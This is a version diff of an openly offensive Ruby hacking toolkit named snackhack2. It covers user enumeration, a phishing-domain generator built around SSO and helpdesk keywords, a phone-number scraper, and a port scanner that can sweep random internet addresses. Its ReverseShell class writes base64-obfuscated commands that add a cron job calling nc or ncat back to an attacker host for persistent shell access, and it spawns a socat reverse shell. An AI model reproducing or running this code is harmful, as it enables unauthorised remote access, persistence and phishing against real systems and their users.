snackhack2 0.6.4 → 0.6.6

data/lib/snackhack2/list_users.rb

@@ -1,31 +1,34 @@
-module Snackhack2
-  class ListUsers
-    attr_accessor :user
-
-    def initialize
-      @user = user
-    end
-
-    def linux
-      `cat /etc/passwd`.split("\n").each do |l|
-        puts l.split(":")[0]
-      end
-    end
-
-    def windows
-      puts `net users`
-    end
-
-    def windows_search_user
-      puts `net user #{@user}`
-    end
-    def auto
-      os = RUBY_PLATFORM
-      if os.match?("linux")
-        linux
-      elsif os.match?("mingw") or os.match?(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)
-        windows
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class ListUsers
+    attr_accessor :user
+
+    def initialize(user)
+      @user = user
+    end
+
+    def linux
+      `cat /etc/passwd`.split("\n").each do |l|
+        puts l.split(':')[0]
+      end
+    end
+
+    def windows
+      puts `net users`
+    end
+
+    def windows_search_user
+      puts `net user #{@user}`
+    end
+
+    def auto
+      os = RUBY_PLATFORM
+      if os.match?('linux')
+        linux
+      elsif os.match?('mingw') || os.match?(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)
+        windows
+      end
+    end
+  end
+end

data/lib/snackhack2/phishing_tlds.rb

@@ -0,0 +1,287 @@
+# frozen_string_literal: true
+
+module Snackhack2
+    class PhishingData
+    def domains
+        [
+           ".com",
+           ".co",
+           ".us",
+           ".net",
+           ".org",
+           ".help",
+           ".app",
+           ".blog",
+           ".info",
+           ".biz",
+           ".store",
+           ".shop",
+           ".tech",
+           ".tv",
+           ".photos",
+           ".fitness",
+           ".fun",
+           ".space",
+           ".solutions",
+           ".email",
+           ".studio",
+           ".top",
+           ".land",
+           ".live",
+           ".me",
+           ".website",
+           ".design",
+           ".digital",
+           ".world",
+           ".gifts",
+           ".love",
+           ".art",
+           ".holiday",
+           ".london",
+           ".tokyo", 
+           ".tips", 
+           ".rocks",
+           ".work"
+        ]
+    end
+    def domain_keywords
+      [
+        "connect",
+        "corp",
+        "duo",
+        "help",
+        "he1p",
+        "helpdesk",
+        "helpnow",
+        "info",
+        "internal",
+        "mfa",
+        "my",
+        "okta",
+        "onelogin",
+        "schedule",
+        "service",
+        "servicedesk",
+        "servicenow",
+        "rci",
+        "rsa",
+        "sso",
+        "ssp",
+        "support",
+        "usa",
+        "vpn",
+        "work",
+        "dev",
+        "workspace",
+        "it",
+        "ops",
+        "hr",
+        "login",
+        "secure"
+      ]
+    end
+  private :domains
+end
+class PhishingTlds < PhishingData
+  attr_reader :site
+  def initialize
+      @site = site
+  end
+  def domain_split
+    # This method splits up the value block_given
+    # given in @site by the period. Which is used
+    # by 'remove_tlds' method to remove the TLDs
+     @site.split(".")
+  end
+  def site=(s)
+      @site = s
+  end
+  def remove_tlds
+    # this method function is to remove
+    # the TLDs from the @site. For Example
+    # it will remove .org, .com 
+    
+    ds = domain_split
+    
+    # remove ".com" (last element in array)
+    ds.pop
+    
+    # returns the domain w/o the tlds
+    ds
+  end
+  def check_domains(array: true)
+    # The function of this method is to
+    # check if the given domains are valid or not. 
+    # By valid I mean resolvable and active. 
+    
+    
+    # if domains is set to true, this array will hold the domains 
+    domains_out = []
+    
+    # build the list of domains
+    generated_tlds = change_tld
+    
+    valid_domains = []
+    not_valid_domains = []
+    
+    generated_tlds.each do |domain|
+      # if array is true; add the domains to array
+      if array
+        domains_out << domain
+      else
+        # if array is false print out the domains
+        puts domain
+      end
+      domains_out if array
+    end
+  end
+  def remove_letters(array_out: true)
+    # This method will remove letters that 
+    # occur more than once. For example:
+    # google.com would become goggle.com
+    
+    # store the letter count in a hash. 
+    letter_count = {}
+    
+    ds = remove_tlds
+    
+    # Creates an array with each character being
+    # stored in a element. It will loop through the array 
+    # and figure out the number of occurrences for each character
+    ds.shift.split(//).each do |letter|
+      if letter_count.has_key?(letter)
+          letter_count[letter] += 1
+      else
+          letter_count[letter] = 1
+      end
+    end
+    
+    # After it creates the hash with the character and 
+    # the number of time it cocures. This method 
+    # will loop through the hash and check to see
+    # if the value is greater than 1. If it is then the key ( the letter)
+    # is added to the array named 'letters_with_more_than_one'
+    letters_with_more_than_one = []
+    letter_count.each do |key, value|
+      if value > 1
+          letters_with_more_than_one << key
+      end
+    end
+    
+    
+    ds = remove_tlds
+    new_ds = ds.shift
+    
+    # the final array with the duplicates letters removed
+    remove_letters_out = []
+    
+    # Loops through the 'letters_with_more_than_one'
+    # array and uses 'sub' to remove the occurence
+    # of one of the letters
+    letters_with_more_than_one.each do |l|
+        # removes only first character ( l )
+        remove_letters_out <<  new_ds.sub(l, "")
+        # removes ALL chracters ( l )
+        remove_letters_out <<  new_ds.gsub(l, "")
+    end
+    
+    domains_with_tlds = []
+    # adding the TLDS to the 'remove_letter_out' array
+    domains.each do |d|
+      remove_letters_out.each do |rl|
+        # adds the words ( rl ) and the TLDS ( d )
+        # to the domains_with_tld array.
+        domains_with_tlds << "#{rl}#{d}"
+      end
+    end
+    if array_out
+        domains_with_tlds
+    else
+       # will print the contents of the array
+       # instead of returning the array
+       domains_with_tlds.each  { |a| puts a }
+    end
+  end
+  def combosquatting
+    # where the generated domains will be located.
+    results = []
+    
+    # get the domain_keywords array from the PhishingData class.
+    keywords = domain_keywords
+    
+    prefixes = ["-", ".", "--"]
+    ds = remove_tlds
+    # this will generate the 'new_domain' with the keywords
+    # as a prefix
+    prefixes.each do |pre|
+      ds.each do |domain|
+        keywords.each do |key|
+          new_domain = "#{key}#{pre}#{domain}"
+          results << new_domain
+        end
+      end
+    end
+    suffixes = ["-", ".", "--"]
+    # this will generate the 'new_domain' with the keywords
+    # as a suffixes
+    suffixes.each do |suf|
+      ds.each do |domain|
+        keywords.each do |key|
+          new_domain = "#{domain}#{suf}#{key}"
+          results << new_domain
+        end
+      end
+    end
+    final_results = []
+    
+    # Loops through the domains array in the PhishingData class
+    domains.each do |tlds|
+      results.each do |r|
+        new_domain = "#{r}#{tlds}"
+        final_results << new_domain
+      end
+    end
+    final_results
+  end
+  def change_tld(no_tld: true)
+    # This method will take the inputted site in @site and 
+    # remove the TLDs and add a new TLDs to the domain. 
+    # its uses the 'domain' method in the PhishingData class
+    # which has an array of a bunch of different tlds. 
+    
+  
+    # if the @site does not have a tlds
+    if no_tld
+      new_domains = []
+      # loop through the tlds
+      domains.each do |d|
+        # combine the inputed @site
+        # and the tlds 
+        new_domains << "#{@site}#{d}"
+      end
+      new_domains
+    else
+      # If the @site does have a TLDs.
+      
+      # this is where the final results
+      # are stored. 
+      list_of_domains = []
+      
+      # removes .com, .org, etc
+      ds = remove_tlds
+    
+      # join the elements together
+      ds = ds.join(".")
+      
+      
+      # loops through the tlds
+      domains.each do |tlds|
+          # adds the new domains to the array
+          list_of_domains <<  ds + tlds
+      end
+    list_of_domains
+    end
+  end
+  private :remove_tlds, :domain_split
+  end
+end

data/lib/snackhack2/phone_number.rb

@@ -1,56 +1,53 @@
-require 'httparty'
-require 'spidr'
-module Snackhack2
-  class PhoneNumber
-    attr_accessor :save_file, :site
-
-    def initialize(save_file: true)
-      @site = site
-      @save_file = save_file
-    end
-
-    def save_file
-      @save_file
-    end
-
-    def run
-      numbers = []
-      http = Snackhack2::get(@site)
-      if http.code == 200
-        regex = http.body
-        phone = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
-        out = phone.map { |n| n[0] }.compact
-        numbers << out
-      else
-        puts "[+] Status code: #{http.code}"
-      end
-      if !numbers.empty?
-        if @save_file
-          hostname = URI.parse(@site).host
-          Snackhack2::file_save(@site, "phone_numbers", numbers.join("\n"))
-        end
-      end
-    end
-
-    def spider
-      phone_numbers = []
-      Spidr.start_at(@site, max_depth: 4) do |agent|
-        agent.every_page do |page|
-          body = page.to_s
-          if body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
-            pn = body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)[0]
-            if !pn.nil?
-              pn = pn.compact.select { |i| !i.to_s.nil? }.shift
-              if !phone_numbers.include?(pn.to_s)
-                phone_numbers << pn
-              end
-            end
-          end
-        end
-      end
-      if !phone_numbers.empty?
-        Snackhack2::file_save(@site, "phonenumbers", phone_numbers.join("\n")) if @save_file
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'httparty'
+require 'spidr'
+module Snackhack2
+  class PhoneNumber
+    attr_accessor :save_file, :site
+
+    def initialize(save_file: true)
+      @site = site
+      @save_file = save_file
+    end
+
+    attr_reader :save_file
+
+    def run
+      numbers = []
+      http = Snackhack2.get(@site)
+      if http.code == 200
+        regex = http.body
+        phone = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+        out = phone.map { |n| n[0] }.compact
+        numbers << out
+      else
+        puts "\n\n[+] Status code: #{http.code}"
+      end
+      return if numbers.empty?
+      return unless @save_file
+
+      URI.parse(@site).host
+      Snackhack2.file_save(@site, 'phone_numbers', numbers.join("\n"))
+    end
+
+    def spider
+      phone_numbers = []
+      Spidr.start_at(@site, max_depth: 4) do |agent|
+        agent.every_page do |page|
+          body = page.to_s
+          if body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+            pn = body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)[0]
+            unless pn.nil?
+              pn = pn.compact.reject { |i| i.to_s.nil? }.shift
+              phone_numbers << pn unless phone_numbers.include?(pn.to_s)
+            end
+          end
+        end
+      end
+      return if phone_numbers.empty?
+
+      Snackhack2.file_save(@site, 'phonenumbers', phone_numbers.join("\n")) if @save_file
+    end
+  end
+end

data/lib/snackhack2/portscan.rb

@@ -1,73 +1,72 @@
-# frozen_string_literal: true
-
-module Snackhack2
-  class PortScan
-    attr_accessor :display, :ip, :delete, :count
-
-    def initialize(display: true, delete: false, count: 10)
-      @ip      = ip
-      @display = display
-      @delete  = delete
-      @count   = count
-    end
-
-    def run
-      threads = []
-      ports = [*1..1000]
-      ports.each { |i| threads << Thread.new { tcp(i) } }
-      threads.each(&:join)
-    end
-
-    def mass_scan
-      generate_ips.each do |ips|
-        tcp = PortScan.new
-        tcp.ip = ips
-        tcp.run
-      end
-    end
-
-    def generate_ips
-      ips = []
-      @count.to_i.times do |c|
-        ips << Array.new(4) { rand(256) }.join('.')
-      end
-      ips
-    end
-
-    def ports_extractor(port)
-      ip = []
-      files = Dir['*_port_scan.txt']
-      files.each do |f|
-        r = File.read(f)
-        if r.include?(port)
-          ip << f.split("_")[0]
-        end
-        File.delete(f) if delete
-      end
-      File.open("#{port}_scan.txt", 'w+') { |file| file.write(ip.join("\n")) }
-    end
-
-    def tcp(i)
-      ip = @ip
-      open_ports = []
-      begin
-        Timeout.timeout(1) do
-          s = TCPSocket.new(@ip, i)
-          s.close
-          open_ports << i
-        rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH
-          return false
-        end
-      rescue Timeout::Error
-      end
-      return if open_ports.empty?
-
-      if @display
-        open_ports.each do |port|
-          puts "#{ip} - #{port} is open\n"
-        end
-      end
-      File.open("#{ip}_port_scan.txt", 'a') { |file| file.write(open_ports.shift.to_s + "\n") }
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class PortScan
+    attr_accessor :display, :ip, :delete, :count
+
+    def initialize(display: true, delete: false, count: 10, terminal_output: false)
+      @ip      = ip
+      @display = display
+      @delete  = delete
+      @count   = count
+      @terminal_output = terminal_output
+    end
+
+    def run
+      threads = []
+      ports = [*1..1000]
+      ports.each { |i| threads << Thread.new { tcp(i) } }
+      threads.each(&:join)
+    end
+
+    def mass_scan
+      generate_ips.each do |ips|
+        tcp = PortScan.new
+        tcp.ip = ips
+        tcp.run
+      end
+    end
+
+    def generate_ips
+      ips = []
+      @count.to_i.times do |_c|
+        ips << Array.new(4) { rand(256) }.join('.')
+      end
+      ips
+    end
+
+    def ports_extractor(port)
+      ip = []
+      files = Dir['*_port_scan.txt']
+      files.each do |f|
+        r = File.read(f)
+        ip << f.split('_')[0] if r.include?(port)
+        File.delete(f) if delete
+      end
+      File.open("#{port}_scan.txt", 'w+') { |file| file.write(ip.join("\n")) }
+    end
+
+    def tcp(i)
+      ip = @ip
+      open_ports = []
+      begin
+        Timeout.timeout(1) do
+          s = TCPSocket.new(@ip, i)
+          s.close
+          open_ports << i
+        rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH
+          return false
+        end
+      rescue Timeout::Error
+      end
+      return if open_ports.empty?
+
+      return unless @display
+
+      open_ports.each do |port|
+        puts "#{ip} - #{port} is open\n"
+      end
+      File.open("#{ip}_port_scan.txt", 'a') { |file| file.write("#{open_ports.shift}\n") }
+    end
+  end
+end

data/lib/snackhack2/reverse_shell.rb

@@ -1,31 +1,32 @@
-require 'base64'
-module Snackhack2
-  class ReverseShell
-    attr_accessor :ip, :port
-    def initialize
-      @ip   = ip
-      @port = port
-    end
-
-    def run
-      c = %Q{#!/bin/bash
-			line="* * * * * nc -e /bin/sh #{@ip} #{@port}"
-			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
-      puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
-    end
-
-    def version2
-      c = %Q{#!/bin/bash
-			line="* * * * * ncat #{@ip} #{@port} -e /bin/bash"
-			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
-      puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
-    end
-
-    def bash
-      c = %Q{
-    		bash.exe -c "socat tcp-connect:#{@ip}:#{@port} exec:sh,pty,stderr,setsid,sigint,sane"
-    	}
-      Process.spawn(c)
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'base64'
+module Snackhack2
+  class ReverseShell
+    attr_accessor :ip, :port
+
+    def initialize()
+      @ip   = ip
+      @port = port
+    end
+
+    def nc
+      c = %{#!/bin/bash
+			line="* * * * * nc -e /bin/sh #{@ip} #{@port}"
+			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
+      puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
+    end
+
+    def ncat
+      c = %{#!/bin/bash
+			line="* * * * * ncat #{@ip} #{@port} -e /bin/bash"
+			(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
+      puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
+    end
+
+    def bash
+      c = %(bash.exe -c "socat tcp-connect:#{@ip}:#{@port} exec:sh,pty,stderr,setsid,sigint,sane")
+      Process.spawn(c)
+    end
+  end
+end